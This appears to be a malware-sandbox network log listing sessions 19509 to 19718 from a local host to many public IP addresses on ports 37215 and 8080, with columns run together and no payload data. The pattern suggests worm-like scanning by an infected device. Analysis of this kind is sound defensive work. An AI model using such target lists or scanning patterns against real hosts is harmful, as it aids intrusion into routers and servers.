                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19509192.168.2.2345626197.87.246.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19510192.168.2.233879041.158.73.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19511192.168.2.2338026163.74.223.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19512192.168.2.234567454.55.71.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19513192.168.2.2339800100.154.192.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19514192.168.2.234799441.77.42.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19515192.168.2.2360378157.93.137.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19516192.168.2.233798441.20.78.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19517192.168.2.23468224.190.148.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19518192.168.2.2354612197.231.71.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19519192.168.2.2355462157.4.120.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19520192.168.2.2355750157.139.206.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19521192.168.2.2360870197.30.52.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19522192.168.2.2340198157.70.140.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19523192.168.2.233886841.156.221.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19524192.168.2.2347230206.34.190.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19525192.168.2.2350224193.207.101.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19526192.168.2.235307642.64.229.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19527192.168.2.2350182157.244.23.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19528192.168.2.2336006197.222.177.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19529192.168.2.2334884178.23.241.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19530192.168.2.2344034157.252.146.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19531192.168.2.233959295.116.13.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19532192.168.2.2351582157.58.233.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19533192.168.2.233545664.232.77.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19534192.168.2.2360786156.71.161.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19535192.168.2.235512273.128.132.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19536192.168.2.236090094.103.209.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19537192.168.2.2358424171.167.154.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19538192.168.2.2358438184.212.234.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19539192.168.2.2349334168.120.211.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19540192.168.2.2342640205.122.50.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19541192.168.2.2333180189.78.164.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19542192.168.2.2337206167.19.91.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19543192.168.2.2336802206.97.226.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19544192.168.2.235024217.112.20.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19545192.168.2.23408182.180.3.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19546192.168.2.2358822173.246.52.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19547192.168.2.233832244.91.98.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19548192.168.2.2333850109.170.64.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19549192.168.2.2343140177.33.101.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19550192.168.2.2332770179.27.6.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19551192.168.2.2334494191.67.228.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19552192.168.2.2348414178.150.227.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19553192.168.2.235538286.66.8.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19554192.168.2.23412682.5.241.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19555192.168.2.2358802138.3.223.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19556192.168.2.234542485.118.244.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19557192.168.2.233288814.162.233.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19558192.168.2.2356136188.63.84.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19559192.168.2.2356070158.156.54.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19560192.168.2.2359242133.167.152.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19561192.168.2.235984625.34.69.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19562192.168.2.235690886.160.79.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19563192.168.2.235000275.162.23.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19564192.168.2.2339360206.132.58.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19565192.168.2.2344296158.63.65.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19566192.168.2.2342104109.55.173.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19567192.168.2.2353156179.148.75.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19568192.168.2.235111441.212.101.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19569192.168.2.2357408134.162.218.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19570192.168.2.234462477.179.177.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19571192.168.2.2336052206.107.205.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19572192.168.2.233422885.191.194.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19573192.168.2.2356354177.238.163.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19574192.168.2.234241077.232.146.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19575192.168.2.234658485.64.94.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19576192.168.2.234583073.33.152.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19577192.168.2.2356874118.29.151.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19578192.168.2.2344668144.51.234.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19579192.168.2.2354562218.182.221.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19580192.168.2.234002896.48.20.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19581192.168.2.236010876.213.183.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19582192.168.2.2359042122.129.193.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19583192.168.2.2349336126.252.83.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19584192.168.2.234116034.217.75.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19585192.168.2.2340652179.218.44.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19586192.168.2.2346946191.10.59.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19587192.168.2.2348742192.111.240.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19588192.168.2.234053023.154.13.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19589192.168.2.236073453.42.3.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19590192.168.2.2355548180.161.165.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19591192.168.2.234087274.101.173.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19592192.168.2.23559389.243.114.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19593192.168.2.233929466.203.14.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19594192.168.2.2343498151.245.83.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19595192.168.2.2349352105.26.173.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19596192.168.2.2356506158.137.34.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19597192.168.2.2342338154.44.193.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19598192.168.2.233771254.153.116.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19599192.168.2.2336744122.236.77.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19600192.168.2.2339940139.196.91.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19601192.168.2.234119417.135.35.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19602192.168.2.233801640.142.181.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19603192.168.2.2333622109.67.60.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19604192.168.2.2345892211.146.220.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19605192.168.2.234888288.56.217.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19606192.168.2.2334004143.174.224.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19607192.168.2.233403884.189.34.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19608192.168.2.233580890.82.244.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19609192.168.2.2347096219.233.228.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19610192.168.2.233714099.173.13.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19611192.168.2.2348212105.168.15.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19612192.168.2.235315019.17.106.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19613192.168.2.2336818190.170.251.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19614192.168.2.2356368207.57.106.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19615192.168.2.234072453.11.250.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19616192.168.2.234918231.242.133.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19617192.168.2.235517250.217.172.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19618192.168.2.235256266.162.232.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19619192.168.2.2360618111.10.206.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19620192.168.2.233552491.192.218.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19621192.168.2.234192425.112.227.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19622192.168.2.2336154154.27.41.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19623192.168.2.2334298103.241.51.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19624192.168.2.2335526135.122.155.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19625192.168.2.2359100155.180.90.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19626192.168.2.2339098137.3.191.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19627192.168.2.2347660118.105.160.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19628192.168.2.233373234.213.60.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19629192.168.2.2347772117.3.208.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19630192.168.2.2340694133.244.150.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19631192.168.2.2343300130.189.182.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19632192.168.2.2345522102.178.141.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19633192.168.2.2345872124.3.23.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19634192.168.2.2357686146.205.247.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19635192.168.2.233907623.222.101.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19636192.168.2.23387961.145.73.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19637192.168.2.234532636.226.100.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19638192.168.2.235180637.122.160.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19639192.168.2.234527032.137.144.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19640192.168.2.2336206111.131.55.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19641192.168.2.2342944115.189.171.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19642192.168.2.2358964183.86.124.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19643192.168.2.2339592160.109.52.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19644192.168.2.2340342148.250.21.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19645192.168.2.234335873.25.238.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19646192.168.2.234371458.54.248.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19647192.168.2.2353680151.225.253.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19648192.168.2.234989284.13.142.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19649192.168.2.233468642.11.55.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19650192.168.2.2335746128.101.145.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19651192.168.2.235744850.5.254.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19652192.168.2.2342498223.152.75.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19653192.168.2.234126295.100.113.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19654192.168.2.2338400218.146.247.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19655192.168.2.2343574156.229.28.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19656192.168.2.2354490183.116.49.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19657192.168.2.2354406116.81.115.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19658192.168.2.2333764143.100.152.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19659192.168.2.234219459.57.129.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19660192.168.2.2345888142.75.251.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19661192.168.2.234024490.195.54.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19662192.168.2.235057818.235.61.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19663192.168.2.235204469.57.203.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19664192.168.2.234657096.101.44.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19665192.168.2.2357826140.175.191.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19666192.168.2.2343924209.110.62.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19667192.168.2.2354830194.15.30.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19668192.168.2.2355026109.71.87.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19669192.168.2.2333484133.84.62.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19670192.168.2.233890485.39.140.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19671192.168.2.234856657.200.175.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19672192.168.2.2342320102.249.152.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19673192.168.2.23543069.200.167.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19674192.168.2.2340656161.83.132.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19675192.168.2.23573308.214.70.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19676192.168.2.235764267.81.94.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19677192.168.2.2357160218.146.238.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19678192.168.2.23598941.47.29.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19679192.168.2.23468581.38.69.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19680192.168.2.235430477.93.152.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19681192.168.2.2347242158.4.47.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19682192.168.2.2356230152.41.183.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19683192.168.2.235351067.148.247.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19684192.168.2.2354560112.130.220.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19685192.168.2.235987642.188.144.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19686192.168.2.2348618109.158.131.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19687192.168.2.233990487.172.58.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19688192.168.2.233645242.172.32.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19689192.168.2.23558708.148.120.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19690192.168.2.2336644142.0.30.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19691192.168.2.2355410184.107.218.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19692192.168.2.235196072.234.187.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19693192.168.2.2354078106.72.20.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19694192.168.2.23420189.164.37.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19695192.168.2.235412837.63.114.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19696192.168.2.2352066121.182.25.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19697192.168.2.2358294222.122.85.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19698192.168.2.234130060.246.247.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19699192.168.2.235030851.155.133.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19700192.168.2.2355092170.179.246.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19701192.168.2.2335500114.217.127.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19702192.168.2.234352062.113.104.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19703192.168.2.235057477.81.114.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19704192.168.2.234909681.221.130.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19705192.168.2.234973495.92.89.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19706192.168.2.2344596108.214.234.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19707192.168.2.2342738186.181.35.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19708192.168.2.2352922213.175.231.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19709192.168.2.2346046149.176.74.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19710192.168.2.23581624.130.130.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19711192.168.2.234336865.29.217.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19712192.168.2.236055039.161.11.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19713192.168.2.2347028138.58.64.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19714192.168.2.233618860.24.229.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19715192.168.2.233859280.131.111.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19716192.168.2.233502688.212.212.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19717192.168.2.234832624.120.5.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19718192.168.2.235865441.47.134.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
